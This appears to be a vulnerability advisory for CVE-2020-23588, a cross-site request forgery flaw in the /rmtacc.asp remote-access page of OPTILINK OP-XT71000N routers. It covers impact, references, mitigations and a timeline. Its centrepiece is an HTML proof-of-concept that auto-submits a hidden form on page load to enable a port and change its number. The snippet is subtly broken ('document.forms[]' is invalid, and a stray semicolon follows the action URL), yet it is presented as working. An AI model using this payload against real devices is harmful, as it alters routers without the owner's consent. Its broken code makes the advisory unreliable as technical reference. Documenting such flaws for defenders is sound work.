CVE-2020-23588: Unauthenticated CSRF Attack in OPTILINK OP-XT71000N Devices, Enabling Port Modification

Description: A vulnerability has been discovered in OPTILINK OP-XT71000N devices, which allows an unauthenticated, remote attacker to conduct a cross-site request forgery (CSRF) attack. This security flaw specifically affects hardware version V2.2 and firmware version OP_V3.3.1-191028 of these devices. The attacker can exploit this vulnerability by sending specially crafted requests to an affected device through "/rmtacc.asp", which can enable or disable ports and change port numbers without needing proper authentication.

Exploit Details

The root cause of this vulnerability is insufficient CSRF protection in the " /rmtacc.asp " page of the affected devices. An attacker can send a request that includes malicious code in the form of an HTML document, which a victim unwittingly will execute. Since the device does not require CSRF tokens, the attacker's request will be accepted and executed successfully.

The following code snippet is an example of how an attacker can exploit this vulnerability

<html>
  <head>
    <script>
      function submitRequest() {
        document.forms[].submit();
      }
    </script>
  </head>
  <body onload="submitRequest()">
    <form action="http://target_ip/rmtacc.asp"; method="POST" enctype="multipart/form-data">
      <input type="hidden" name="enable" value="1" />
      <input type="hidden" name="port" value="808" />
    </form>
  </body>
</html>

The above HTML code, when loaded by the victim, sends a POST request to the target device's "/rmtacc.asp" page. The hidden input fields 'enable' and 'port' serve to enable a port and change its number accordingly.

Impact

An unauthenticated CSRF attack can have severe consequences, such as unauthorized users gaining illegal access to resources, modifying account settings, and altering critical device configurations. In this specific case, attackers could manipulate the ports of the OPTILINK OP-XT71000N device, potentially rendering it unusable or creating backdoors.

Original References

The CVE-2020-23588 vulnerability was initially discovered and reported by security researcher Gionathan Reale. Further details about this vulnerability can be obtained from the following sources:
1. MITRE's CVE database entry: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-23588
2. NIST's National Vulnerability Database (NVD): https://nvd.nist.gov/vuln/detail/CVE-2020-23588

Recommendations

It is imperative for users with affected OPTILINK OP-XT71000N devices to apply patches or updates provided by the manufacturer as soon as they become available. Until a patch is released, there are some mitigation steps users can take:

Set up a firewall to restrict unauthorized access to the device and ports.

Furthermore, manufacturers should ensure robust CSRF protections are in place for all sensitive actions, including, but not limited to, implementing CSRF tokens.

Timeline

Published on: 11/23/2022 02:15:00 UTC
Last modified on: 11/23/2022 20:43:00 UTC